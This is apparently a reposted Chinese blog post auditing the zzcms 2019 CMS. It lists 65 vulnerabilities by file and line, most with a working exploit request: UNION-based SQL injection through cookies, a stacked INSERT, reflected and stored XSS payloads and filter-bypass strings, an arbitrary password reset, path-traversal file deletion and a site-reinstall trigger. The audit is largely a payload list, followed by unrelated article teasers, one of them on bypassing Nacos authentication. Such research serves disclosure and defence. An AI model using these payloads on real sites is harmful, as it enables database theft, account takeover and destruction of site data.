代码审计:zzcms 2019

news2024/9/21 16:49:20

代码审计:zzcms 2019

漏洞列表如下(共计65个漏洞,附Exp,按时间顺序):
未完待续…

1、install/index.php 8行处存在变量覆盖漏洞(影响install/step_6.php) Exp:http://127.0.0.3/install/index.php Post:admin=<script>alert(1)</script>&step=6
2、bluecms/admin/login.php 31行处存在Cookie用户名密码明文传输漏洞 e.g. Cookie:PHPSESSID=k1lsech0g94r1mg7uh4rf5ado6; admin=admin; pass=21232f297a57a5a743894a0e4a801fc3;
3、uploadimg_form.php 64行处存在反射型XSS漏洞 Exp:http://127.0.0.3/uploadimg_form.php?noshuiyin="/><script>alert(1);</script>
4、uploadimg_form.php 65行处存在反射型XSS漏洞 Exp:http://127.0.0.3/uploadimg_form.php?imgid="/><script>alert(1);</script>
5、uploadimg_form.php 75行处存在反射型XSS漏洞 Exp:http://127.0.0.3/uploadimg_form.php Post:flvurl=');</script><?php phpinfo(); ?><script>alert('1
7、ask/caina.php 21行处存在反射型XSS漏洞 Exp:http://127.0.0.3/ask/caina.php Referer:127.0.0.3";alert(1);parent.location="
8、ask/search.php 48行处存在sql注入漏洞 Exp:http://127.0.0.3/ask/search.php Cookie:askb=1' union SELECT 1,2,user(),4,5,6,7,8,9,10,11 limit 1,1#
9、ask/search.php 56行处存在sql注入漏洞 Exp:http://127.0.0.3/ask/search.php Cookie:asks=1' union SELECT 1,2,user(),4,5,6,7,8,9,10,11 limit 1,1#
10、ask/search.php 167行处存在Sql注入漏洞(存疑) Exp:http://127.0.0.3/ask/search.php Cookie:page_size_ask=1%3BINSERT INTO zzcms_ask (id, bigclassid,bigclassname,smallclassid,smallclassname,title,content,img,jifen,editor,sendtime,hit,elite,typeid,passed) VALUES (2,1,1,2,3,user(),'ggg',1,0,'hhh','2024-07-31 00:33:55',1,1,1,1) %3B
11、inc/function.php 109行存在IP伪造漏洞
12、ask/show.php 114行处存在反射型XSS漏洞(存疑) Exp:http://127.0.0.3/ask/show.php Post:id=1 Cookie:UserName="/><script>alert(1);</script><input name="hh" value="1
13、baojia/baojiaadd.php 174行存在sql注入漏洞 Exp:http://127.0.0.3/baojia/baojiaadd.php Cookie:UserName=1' union select 1,2,3,4,5,6,7,user(),9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8 limit 0,1#
14、baojia/search.php 119行处存在sql注入漏洞 Exp:http://127.0.0.3/baojia/search.php Cookie:b=' union select user(),1#
15、baojia/search.php 258行处存在sql注入漏洞 Exp:http://127.0.0.3/baojia/search.php Cookie:keyword=' union select user() limit 1,1#
16、baojia/search.php 258行处存在sql注入漏洞 Exp:http://127.0.0.3/baojia/search.php Cookie:province='  union select user() limit 1,1#
17、baojia/search.php 258行处存在sql注入漏洞 Exp:http://127.0.0.3/baojia/search.php Cookie:city='  union select user() limit 1,1#
18、baojia/search.php 258行处存在sql注入漏洞 Exp:http://127.0.0.3/baojia/search.php Cookie:xiancheng='  union select user() limit 1,1#
19、baojia/search.php 258行处存在反射型XSS漏洞 Exp:http://127.0.0.3/baojia/search.php Cookie:keyword="/><script>alert(1)</script><meta name="keywords1" content="
20、baojia/search.php 258行处存在反射型XSS漏洞 Exp:http://127.0.0.3/baojia/search.php Cookie:province="/><script>alert(1)</script><meta name="keywords1" content="
21、baojia/search.php 258行处存在反射型XSS漏洞 Exp:http://127.0.0.3/baojia/search.php Cookie:city="/><script>alert(1)</script><meta name="keywords1" content="
22、baojia/search.php 258行处存在反射型XSS漏洞 Exp:http://127.0.0.3/baojia/search.php Cookie:xiancheng="/><script>alert(1)</script><meta name="keywords1" content="
23、company/search.php 119行处存在sql注入漏洞 Exp:http://127.0.0.3/company/search.php Cookie:b=' union select user(),1#
24、company/search.php 136行处存在sql注入漏洞 Exp:http://127.0.0.3/company/search.php Cookie:companyb=1' union select 1,2,user(),4,5,6,7,8,9,10,11 limit 1,1#
25、company/search.php 136行处存在sql注入漏洞 Exp:http://127.0.0.3/company/search.php Cookie:companys=1' union select 1,2,user(),4,5,6,7,8,9,10,11 limit 1,1#
26、company/search.php 308行处存在sql注入漏洞 Exp:http://127.0.0.3/company/search.php Cookie:province='  union select user() limit 1,1#
27、company/search.php 308行处存在sql注入漏洞 Exp:http://127.0.0.3/company/search.php Cookie:city='  union select user() limit 1,1#
28、company/search.php 308行处存在sql注入漏洞 Exp:http://127.0.0.3/company/search.php Cookie:xiancheng='  union select user() limit 1,1#
29、baojia/search.php 308行处存在反射型XSS漏洞 Exp:http://127.0.0.3/company/search.php Cookie:province="/><script>alert(1)</script><meta name="keywords1" content="
30、baojia/search.php 308行处存在反射型XSS漏洞 Exp:http://127.0.0.3/company/search.php Cookie:city="/><script>alert(1)</script><meta name="keywords1" content="
31、baojia/search.php 308行处存在反射型XSS漏洞 Exp:http://127.0.0.3/company/search.php Cookie:xiancheng="/><script>alert(1)</script><meta name="keywords1" content="
32、baojia/searchform.php 74行处存在反射型XSS漏洞 Exp:http://127.0.0.3/company/searchform.php Cookie:companyb="/><script>alert(1)</script><meta name="keywords1" content="
33、inc/function.php 956行处存在用户伪造漏洞 Exp:Cookie:UserName=admin
34、dl/dl_download.php 36行处存在sql注入漏洞 Exp:http://127.0.0.3/dl/dl_download.php Cookie:UserName=' union select concat(999,user()) #
35、dl/dl_sendsms.php 77行处存在sql注入漏洞(理论上) Exp:http://127.0.0.3/dl/dl_sendsms.php Cookie:dlid=1' union select user()  #
36、dl/dladd.php 174行存在sql注入漏洞 Exp:http://127.0.0.3/dl/dladd.php Cookie:UserName=' union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,user(),8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8 #
37、dl/search.php 存在8个漏洞,与baojia/search.php的漏洞类似,不再重复
38、job中出现的漏洞与baojia里类似,不再重复
39、pp中出现的漏洞与baojia里类似,不再重复
40、special中出现的漏洞与baojia里类似,不再重复
41、zs中出现的漏洞与baojia里类似,不再重复
42、zh中出现的漏洞与baojia里类似,不再重复
43、wangkan中出现的漏洞与baojia里类似,不再重复
44、one/getpassword.php 第73行存在更改任意用户密码漏洞 Exp:http://127.0.0.3/one/getpassword.php Post:action=step3&username=admin&passwordtrue=admin888
45、zs/dl_liuyan_save.php 第52行存在CSRF漏洞 Exp:http://127.0.0.3/zs/dl_liuyan_save.php Post:token=1&name=a Cookie:token=1 Referer:baidu.com";alert(1);parent.location="
46、zs/dl_liuyan_save.php 第52行存在反射型XSS漏洞 Exp:http://127.0.0.3/zs/dl_liuyan_save.php Post:token=1&name=a Cookie:token=1 Referer:baidu.com";alert(1);parent.location="
47、zs/dl_liuyan_save.php 第53行存在CSRF漏洞 Exp:http://127.0.0.3/zs/dl_liuyan_save.php Post:token=1&tel=a Cookie:token=1 Referer:baidu.com";alert(1);parent.location="
48、zs/dl_liuyan_save.php 第53行存在反射型XSS漏洞 Exp:http://127.0.0.3/zs/dl_liuyan_save.php Post:token=1&tel=a Cookie:token=1 Referer:baidu.com";alert(1);parent.location="
49、ask/caina.php 21行处存在CSRF漏洞 Exp:http://127.0.0.3/ask/caina.php Referer:baidu.com";alert(1);parent.location="
50、zs/dl_liuyan_save.php 第111行存在CSRF漏洞 Exp:http://127.0.0.3/zs/dl_liuyan_save.php Post:token=1&name=a Cookie:token=1 Referer:baidu.com";alert(1);parent.location="
51、zs/dl_liuyan_save.php 第111行存在反射型XSS漏洞 Exp:http://127.0.0.3/zs/dl_liuyan_save.php Post:token=1&name=a Cookie:token=1 Referer:baidu.com";alert(1);parent.location="
52、zt/top.php 第21行存在sql注入漏洞(理论上),同样影响zt/adv.php Exp:http://'+union+select+1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,user()#.1.com/zt/top.php
53、reg/sendmailagain.php 第40行存在查看临时用户密码漏洞 Exp:http://127.0.0.3/reg/sendmailagain.php Post:username=admin&newemail=1@qq.com
54、user/adv.php 第52行存在任意图片文件删除漏洞 Exp:http://127.0.0.3/user/adv.php Post:action=modify&img=http://127.0.0.3/1.php;jpg&oldimg=test/../uploadfiles/../image/h.gif
55、user/adv2.php 第67行存在sql注入漏洞 Exp:http://127.0.0.3/user/adv2.php Post:action=modify&id=0 union select 1,2,3,4,5,6,7,8,9,user(),1,2,3,4 #
56、user/login.php 第111行存在反射型XSS漏洞 Exp:http://127.0.0.3/user/login.php Cookie:UserName=</span></div><script>alert(1)</script><div><span>
57、user/adv.php 第120行存在反射型XSS漏洞 Exp:http://127.0.0.3/user/adv.php Post:action=add&advlink=' οnclick=alert(1) '&adv=123
58、admin/ad_user_manage.php 第52行存在二次注入漏洞 Exp1:http://127.0.0.3/admin/ad_user_manage.php?action=pass Post:id=1  Exp2:http://127.0.0.3/user/adv.php Post:action=add&advlink=hhh&adv=123&img=',title=user() #
59、zh/show.php 第29行存在储存型XSS漏洞(由stripfxg函数导致) Exp:http://127.0.0.3/zh/show.php?id=1
60、admin/dl_data.php 第19行存在任意文件删除漏洞 Exp:http://127.0.0.3/admin/dl_data.php?action=del&filename=../1.php
61/user/ask.php 第20行存在存储型XSS漏洞(由markit()导致,在后台查看不良操作记录时触发) Exp:http://127.0.0.3/user/ask.php?do=modify&page=1&id=1&aaa=<sCrIpT>alert(/xss/)</ScRiPt>
62、install/index.php 第21行存在网站重装漏洞 http://127.0.0.3/install/index.php Post:step=2
63、admin/deluser.php 第19行存在任意文件删除漏洞
64、admin/del.php 第19行存在任意目录删除漏洞
65、admin/uploadfile_nouse.php 第19行存在任意文件删除漏洞

请添加图片描述
请添加图片描述

在这里插入图片描述
在这里插入图片描述

//当存在Get、Post的时候才执行这个语句,导致Cookie逃逸 或者利用变量覆盖
if($_REQUEST){
	$_POST =zc_check($_POST);
	$_GET =zc_check($_GET);
	$_COOKIE =zc_check($_COOKIE);
	@extract($_POST);
	@extract($_GET);
}



//在user/del.php 中,若能控制数据库中任意一个表的img参数,则可实现任意文件删除

// "/><?php phpinfo();?><meta name="keywords1" content="

//htmlspecialchars() 默认只编码双引号,虽然不能用双引号和<> 但是可以用 ‘,所以我
们的单引号很可能可以用。
//<scri<!--test-->pt>alert(111)</sc<!--test-->ript>
//<SCrIpt>alert(1)</SCrIpt>

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1967330.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

SmartEDA:解锁设计新境界,从工具到灵感的飞跃之旅!

在这个数据驱动的时代&#xff0c;每一次点击、每一次滑动都蕴含着无限的可能与洞察。然而&#xff0c;在众多数据分析工具中&#xff0c;SmartEDA不仅仅是一把解锁数据奥秘的钥匙&#xff0c;它更是一座桥梁&#xff0c;连接着冰冷的数据世界与创意无限的设计灵感之源。今天&a…

Nacos身份认证绕过的方法

因为在攻防或渗透的一些安全服务过程中&#xff0c;我们经常会遇到在公网能访问到的Nacos系统&#xff0c;按理来说这些系统都是要收缩到内网里面的&#xff0c;所以遇到这种情况我们肯定是要去尝试下能否进入到后台&#xff0c;之前团队搞过这类的实验&#xff0c;那就结合这次…

若依替换logo

别忘了清除浏览器缓存

Hive3:客户端工具DBeaver连接Hive

参考&#xff1a;DBeaver连接hive&#xff08;详细图解&#xff09; 这里&#xff0c;需要说明一点&#xff0c;在添加驱动的时候&#xff0c;你可能不知道自己需要什么版本的驱动 我的办法是&#xff0c;先通过IDEA链接上hive&#xff0c;然后&#xff0c;查看IDEA下载的版本…

kvm-fuzz:使用KVM技术对闭源用户空间二进制文件执行模糊测试

关于kvm-fuzz kvm-fuzz是一款功能强大的模糊测试工具&#xff0c;该工具能够利用KVM技术对闭源用户空间x86_64二进制文件执行模糊测试。 KVM介绍 虚拟化是云计算的基础&#xff0c;一种资源管理技术&#xff0c;是将计算机的各种实体资源&#xff08;CPU、内存、磁盘空间、网…

dataOptions.call is not a function(vue3)

我在网上看了很多案例&#xff0c;但是好像和我项目中的 bug 都不一样&#xff0c;然后我自己尝试复现&#xff0c;也出现了这个 报错&#xff0c;但是我还没有对比我项目中的代码&#xff0c;因为是 vue2 升 vue3 的&#xff0c;代码量有点多&#xff0c;所以先记录一下目前这…

[C++]智能指针

一、RAII RAII&#xff08;Resource Acquisition Is Initialization&#xff09;是一种利用对象生命周期来控制程序资源&#xff08;如内 存、文件句柄、网络连接、互斥量等等&#xff09;的简单技术。 在对象构造时获取资源&#xff0c;接着控制对资源的访问使之在对象的生命…

【Android】数据存储之SQLite数据库知识总结

文章目录 SQL数据类型创建表格删除表格修改表格 数据库管理器SQLiteDatabase数据库的创建与删除 SQLiteOpenHelper使用步骤新建数据库操作类增删改查方法使用 SQLite 数据库版本更新 相关知识点ContentValues 类Cursor SQL SQL本质上是一种编程语言&#xff0c;它的学名叫作&qu…

pc端微信小程序接口抓包-2024最新方法

工具下载及安装 抓包工具&#xff08;charles、burpsuite之类&#xff09;代理工具(这里以proxifier为例&#xff0c;无需破解版&#xff0c;网上有公开的注册码) 配置 1、抓包工具配置&#xff08;这里以burpsuite为例&#xff09; 设置代理监听配置地址和端口&#xff0c;…

【QIIME2】细菌16s数据库_Greengenes

文章目录 下载Greengenes数据库在QIIME2中使用导入QIIME2中提取引用读取训练分类器测试分类器导出结果生成可视化文件 由于Bugbase功能注释时&#xff0c;输入的OTU表需经Greengenes注释&#xff08;且由于时间原因须是第一版&#xff09;&#xff0c;故尝试使用Greengenes对16…

探索Python网络自动化的宝库:Paramiko的秘密

文章目录 探索Python网络自动化的宝库&#xff1a;Paramiko的秘密第一部分&#xff1a;背景介绍为什么选择Paramiko&#xff1f;Paramiko能做什么&#xff1f;接下来... 第二部分&#xff1a;Paramiko是什么&#xff1f;第三部分&#xff1a;如何安装Paramiko&#xff1f;第四部…

Java OOP世界之多态

多态的概念 通俗来说&#xff0c;就是多种形态&#xff0c;具体点就是去完成某个行为&#xff0c;当不同的对象去完成时会产生出不同的状态。同一件事情&#xff0c;发生在不同对象身上&#xff0c;就会产生不同的结果。比如之前讲类和对象的时候举的猫狗的栗子&#xff0c;这…

代码随想录算法训练营第35天|01背包理论基础、01背包理论基础(滚动数组)、416. 分割等和子集

打卡Day35 1.01背包理论基础2.01背包理论基础&#xff08;滚动数组&#xff09;3.416. 分割等和子集 1.01背包理论基础 题目链接&#xff1a;01背包理论基础 文档讲解&#xff1a; 代码随想录 01背包&#xff1a; 有n件物品和一个最多能背重量为w 的背包。第i件物品的重量是we…

Studying-代码随想录训练营day50| 图论理论基础、深搜理论基础、98. 所有可达路径、广搜理论基础

第50天&#xff0c;图论开始&#xff01;最后的刷题冲刺&#xff01;&#x1f4aa;(ง •_•)ง&#xff0c;编程语言&#xff1a;C 目录 图论理论基础 图的基本概念 图的种类 度 连通性 连通图&#xff08;无向图概念&#xff09; 强连通图&#xff08;有向图概念&…

全局统一的异常处理方案

1. 在Common包中统一定义异常处理类 2. 在common包中定义异常拦截器 ExceptionHandler&#xff08;BusinessException.class&#xff09;:表示要拦截的异常类型为BusinessException 3. 在自己的项目中使用这个全局异常拦截器 继承CommonControllerAdvice并且配上ControllerAd…

MySQL数据库-事务

一、什么是事务 1.概念 事务&#xff08;Transaction&#xff09;&#xff1a;一个最小的不可再分的工作单元&#xff0c;一个事务对应一个完整的业务&#xff0c;一个完整的业务需要批量的DML(insert、update、delete)语句共同联合完成&#xff0c;事务只针对DML语句。 数据…

天气曲线echarts

1. 用多x轴实现日期&#xff0c;图标&#xff0c;控制定位固定显示高度 2.背景遮罩抛开echarts另外用div 3.设置grid的offset控制温度折线的范围 html <div class"right_bottom"><basicEchartsstyle"height: 400px; width: 1200px":option"c…

在Windows上用虚拟机安装统信UOS专业版教程

事情的起因 就是我想要一台华为电脑&#xff0c;然后上网搜索选购攻略。然后看到了一个新闻&#xff0c;就是英特尔&#xff0c;高通对华为停止供应&#xff0c;然后华为要研发自己的CPU操作系统 然后我也不了解&#xff0c;继续搜索&#xff0c;就好像是这个操作系统 统信UO…